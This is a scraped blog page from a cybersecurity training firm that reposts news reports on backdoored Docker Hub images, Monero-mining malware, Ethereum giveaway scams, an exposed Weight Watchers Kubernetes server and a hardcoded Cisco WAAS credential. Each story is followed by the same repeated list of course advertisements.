Docker is a computer program that performs operating-system-level virtualization also known as containerization. It is developed by Docker, Inc. Docker is primarily developed for Linux, where it uses the resource isolation features of the Linux kernel such as cgroups and kernel namespaces.

The Docker team has pulled 17 Docker container images that have been backdoored and used to install reverse shells and cryptocurrency miners on users’ servers for the past year.

The malicious Docker container images have been uploaded on Docker Hub, the official repository of ready-made Docker images that sysadmins can pull and use on their servers, work, or personal computers.

These Docker images allow sysadmins to quickly start an application container within seconds, without having to create their own Docker app container, a complicated and painstaking process that not all users are technically capable or inclined to do.

 

Docker

 

 

Malicious Docker images remained online for a year

Just like it happened with other package repositories in the past —such as Python and npm— malicious actors have uploaded malicious packages on the main Docker Hub repository.

Because new Docker images don’t go through a security audit or testing process, these images were listed on the Docker Hub portal right away, where they remained active between May 2017 and May 2018, when the Docker team finally intervened to pull them down.

All 17 images were uploaded on the Docker Hub portal by the same person/group, using the pseudonym of “docker123321.” Some of these packages have been installed more than one million times, while others were used hundreds of thousands of times.

 

Malicious Docker images

 

Took a while before users caught on to what was happening

Signs that something was wrong on the Docker and Kubernetes (app for managing Docker images at a large scale) scene started appearing last September and continued through the winter. Users reported that malicious activity was happening on their cloud servers running Docker and Kubernetes instances. Reports of security incidents involving Docker images were posted on GitHub and Twitter.

Several security firms and security researchers such as Sysdig, Aqua Security, and Alexander Urcioli also published reports about security incidents they’ve observed.

 

Github

 

 

Malicious Docker images taken offline

While the number of security incidents grew, it was only when Fortinet and Kromtech got involved that all the pieces surrounding these hacks got put together, and researcher tracked down all these incidents to the docker123321 account.

Docker removed the 17 backdoored images from Docker Hub on May 10, this year, a week after Fortinet published a report about some of the cryptocurrency mining incidents linking back to Docker images created by the docker123321 account.

 

security

 

Some affected servers may still be compromised

Kromtech researchers warn that some of these images also contained backdoor-like capabilities thanks to the embedded reverse shells.

This means that even if victims stopped using or removed the malicious Docker images, the attacker could have very easily obtained persistence on their systems through other means, possibly granting them access to the system at a later time.

 

Kromtech

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 


  • 0
Monero

Monero Currently in Circulation Has Been Mined Using Malware

Category : Blog

Monero Currently in Circulation Has Been Mined Using Malware

Monero cryptocurrency currently in circulation has been mined using malware, and about 2% of the total daily hashrate comes from devices infected with cryptocurrency-mining malware. These numbers are the results of in-depth research of the coin-mining malware scene by security researchers from Palo Alto Networks.

The report, released June 11, has analyzed 629,126 malware samples that have been detected as part of coin-mining operations. The research didn’t analyze in-browser miners (cryptojackers), but only traditional malware families that infected desktops and servers since June last year, when there was a significant spike in coin-mining operations.

The research team at Palo Alto discovered because malware needs to be built directly into the source code of cryptocurrency mining pool. The malware also requires a Monero address under which it operates and handles any illegal funds generated from mining the cryptocurrency.

 

Monero

 

 

Monero is the most popular cryptocoin

According to researchers, 84% of all malware samples they’ve detected were focused on mining for the Monero cryptocurrency, by far the most popular coin among malware groups.

Because Monero-based coin-mining malware must embed in its source code the mining pool and Monero address through which the malware operates and collects ill-gotten funds, researchers have been able to track most of the money these groups generated on infected devices.

By querying nine mining pools (which allow third-parties to query their payment stats) with the 2,341 Monero addresses researchers found embedded in the 531,6663 malware samples that focused on mining Monero, they were able to determine the amount of funds these groups have made in the past year.

 

coin-mining

 

Malware groups made over $108 million worth of Monero

According to Palo Alto Networks researchers, criminal groups have mined an approximate total of 798,613.33 Monero coins (XMR) using malware on infected devices.

That’s over $108 million in US currency, just from coin-mining operations alone. This sum also represents around 5% of all the Monero currently in circulation —15,962,350 XMR.

Furthermore, since mining pools also reveal a miner’s hash rate —the speed at which a miner completes an operation— researchers were also able to determine the amount of Monero coin-mining botnets have been generating per day.

Researchers say that during the past year, infected devices were responsible for 19,503,823.54 hashes/second, which is roughly 2% of the entire hashing power of the Monero network.

 

Malware

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 


  • 0
Ethereum

Ethereum “Giveaway” Scammers Have Tricked People Out of $4.3 Million

Category : Blog

Ethereum “Giveaway” Scammers Have Tricked People Out of $4.3 Million

Ethereum is a distributed public blockchain network. the Ethereum blockchain focuses on running the programming code of any decentralized application.

In the Ethereum blockchain, instead of mining for bitcoin, miners work to earn Ether, a type of crypto token that fuels the network.

Online crooks promoting fake “giveaways” have tricked people out of 8,148 Ether, currently worth around $4.3 million, according to statistical data compiled in EtherScamDB.

The EtherScamDB website was created by the team behind the MyCrypto wallet service for the purpose of tracking various types of online scams centering around the Ethereum platform and associated cryptocurrencies and assets.

For the past few months, the website has been inventorying various types of Ethereum scams, such as classic phishing sites that imitate legitimate apps and wallets, trust-trading sites that push inaccurate advice or recommendations, but also online giveaways scams that promise to multiply Ether funds if victims transfer crooks a small sum of money.

 

Ethereum

 

Twitter’s “Ether giveaway” scam problem

The latter category has recently become rampant on Twitter, and on a daily basis, the social network’s most popular tweets are often inundated by these “Ether giveaway” scams.

More precisely, this particular trend caught fire with crooks this past February after Bleeping Computer first reported that one particular scammer made $5,000 in one night just by posing as Elon Musk, John McAfee, and a few other celebrities on Twitter.

Soon after our report, scams of these types started to flood Twitter left and right, with crooks registering Twitter accounts with names similar to legitimate ones, and then posting misleading messages, asking users to donate funds to an Ethereum address to receive a multiplied sum as part of a limited offer giveaway.

 

scams

 

EtherScanDB tracks hundreds of fake giveway addresses

Some of these scams and the Ether addresses where crooks have been collecting “donations” for the fake giveaways have been tracked in the EtherScamDB.

According to a recent tweet by John Backus, founder of Bloom and Cognito, two blockchain-powered apps, crooks promoting these giveaway scams have made 8,148 Ether ($4.3 million) just from the Ether funds sent to the 468 Ethereum addresses tracked by the site.

This sum is obviously larger, since the website does not track all giveaway scams, but even so, this small statistics shows how big this problem is today.

 

blockchain

 

Twitter’s been slow to react

Twitter, in particular, has been slow to respond to users reporting ake accounts, sometimes taking days or weeks to suspend obvious clones. Nevertheless, with a limited support staff, and with all the hate speech and terrorist propaganda happening on the platform, it is somewhat understandable why Twitter has been slow to react.

In the meantime, spreading the word about this scam is probably the best way to educate users and remind them to pay attention to the Twitter handle from which these offers are being made.

But while some might think the consensus advice is to tell users to “pay attention to the Twitter handle pushing an Ethereum giveaway,” the actual sensible advice is to “not participate in giveaways” to begin with, since most of these are just plain ol’ scams.

 

Twitter

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad


  • 0
Weight Watchers

Weight Watchers IT Infrastructure Exposed via No-Password Kubernetes Server

Category : Blog

Weight Watchers suffered a small Security Breach

Weight Watchers is the registered trademark of Weight Watchers International, Inc.

Just like many companies before it, weight loss program Weight Watchers suffered a small security breach after security researchers found a crucial server exposed on the Internet that was holding the configuration info for some of the company’s IT infrastructure.

The exposed server was a Kubernetes instance, a type of software for managing large IT networks and easily deploying app containers across multiple servers, usually on a cloud infrastructure.

Dozens of servers containing Weight Watcher’s data were left exposed after the company failed to password protect software used for managing application containers, according to German cybersecurity firm Kromtech.

An Amazon cloud infrastructure used by Weight Watchers was left vulnerable—46 Amazon S3 buckets in total—including logs, passwords, and private encryption keys, Kromtech found.

 

Weight Watchers

 

Weight Watchers ran a no-password Kubernetes instance

Researchers from German cyber-security firm Kromtech discovered that Weight Watchers forgot to set a password for the administration console of one of its Kubernetes instances.

This granted anyone knowing where to look (port 10250) access to this servers, without the need to enter a username and password.

All in all, the Kubernetes instances exposed an administrator’s root credentials, access keys for 102 of their domains, and 31 IAM users including users with administrative credentials and applications with programmatic access.

Weight Watchers added that its internal team and a third-party forensics company investigated the incident and that “each has independently confirmed that there was no indication that any personally identifiable information was exposed,” a spokesperson said.

The exposure was the result of a misconfigured Kubernetes instance, Kromtech said. Kubernates is a tool developed by Google for managing large numbers of applications. Notably, a Kubernetes instance on Telsa’s cloud infrastructure was hacked earlier this year, and then used by the perpetrators to mine cryptocurrency.

 

Kubernetes

 

Unclear what data was exposed

It is unclear if someone else besides the Kromtech team discovered this Kubernetes instance, but an attacker with access to this server would have been able to access a large part of Weight Watchers’ network.

It is also unclear what kind of data (user details?) these servers were storing, as the Kromtech team could not go wandering off inside Weight Watchers’ network without violating a slew of laws.

Diachenko and the Kromtech team said they reported the exposed server to Weight Watchers, who quickly remediated the issue, thanking the researchers.

 

Unclear Data

 

Weight Watchers claims it was a non-production network

“We really appreciate the community working to make us all safer,” a Weight Watchers spokesperson said in its response to Kromtech.

“We have confirmed the issue – a security group for a test cluster in our non-production account was misconfigured during testing. The issue should be resolved and keys should be revoked. We’ve also implemented some safeguards to protect against this issue from recurrence.”

But Kromtech disputes Weight Watchers’ explanation that this was a non-production account. Nonetheless, today, a Weight Watchers spokesperson stood by its initial statement.

“Last week, Weight Watchers received a report from security researchers related to the exposure of credentials in one non-production AWS account,” a company spokesperson told Bleeping Computer via email. “The account was in a testing environment clearly labeled ‘nonprod’ and is used only to test new services and features.”

“To be able to test and innovate securely, we keep test environments completely separate from production environments. Our internal team and a reputable third-party security forensics team have investigated the exposed account key scope and activity, and each has independently confirmed that there was no indication that any personally identifiable information was exposed,” the spokesperson told us.

Weight Watchers is certainly not the first company to have to deal with a leaky or non-protected server. Other companies that suffered a similar fate include Tesla, Honda, Universal, and Bezop, just to name a few.

 

Kromtech

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 

 

 


  • 0

Cisco Removes Backdoor Account, Fourth in the Last Four Months

Category : Blog

Cisco Removes Backdoor Account, Fourth in the Last Four Months

Cisco is the largest networking company in the world. The stock was added to the Dow Jones Industrial Average on June 8, 2009, and is also included in the S&P 500 Index, the Russell 1000 Index, NASDAQ-100 Index and the Russell 1000 Growth Stock Index.

For the fourth time in as many months, Cisco has removed hardcoded credentials that were left inside one of its products, which an attacker could have exploited to gain access to devices and inherently to customer networks.

This time around, the hardcoded password was found in Cisco’s Wide Area Application Services (WAAS), which is a software package that runs on Cisco hardware that can optimize WAN traffic management.

 

Cisco

 

Harcoded SNMP community string

This backdoor mechanism (CVE-2018-0329) was in the form of a hardcoded, read-only SNMP community string in the configuration file of the SNMP daemon.

SNMP stands for Simple Network Management Protocol, an Internet protocol for collecting data about and from remote devices. The community string was there so SNMP servers knowing the string’s value could connect to the remote Cisco device and gather statistics and system information about it.

 

SNMP

 

Hardcoded creds is invisible to device owners

Making matters worse, this SNMP community string is hidden from device owners, even from the ones with an admin account, meaning they couldn’t have located it on their own during regular security audits.

The string came to light by accident, while security researcher Aaron Blair from RIoT Solutions was researching another WaaS vulnerability (CVE-2018-0352).

This second vulnerability was a privilege escalation in the WaaS disk check tool that allowed Blair to elevate his account’s access level from “admin” to “root.” Normally, Cisco users are permitted only admin access. The root user level grants access to the underlying OS files and is typically reserved only for Cisco engineers.

 

vulnerability

 

WaaS updates released to remove hardcoded SNMP creds

The researcher reported the issue to Cisco in March. Cisco released updates for WaaS this week. There are no mitigations or workarounds for avoiding the exploitation, and users must apply the WaaS software updates.

The Cisco WaaS patches are part of a batch of 28 security fixes that Cisco released on June 6, this week.

Twice in March and again in May, Cisco removed other similar backdoor accounts and mechanisms in other software such as the Prime Collaboration Provisioning (PCP), the IOS XE operating system, and the Digital Network Architecture (DNA) Center. Unlike this latest issues, the first three were discovered by Cisco engineers during internal audits.

 

WaaS

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 


Show Buttons
Hide Buttons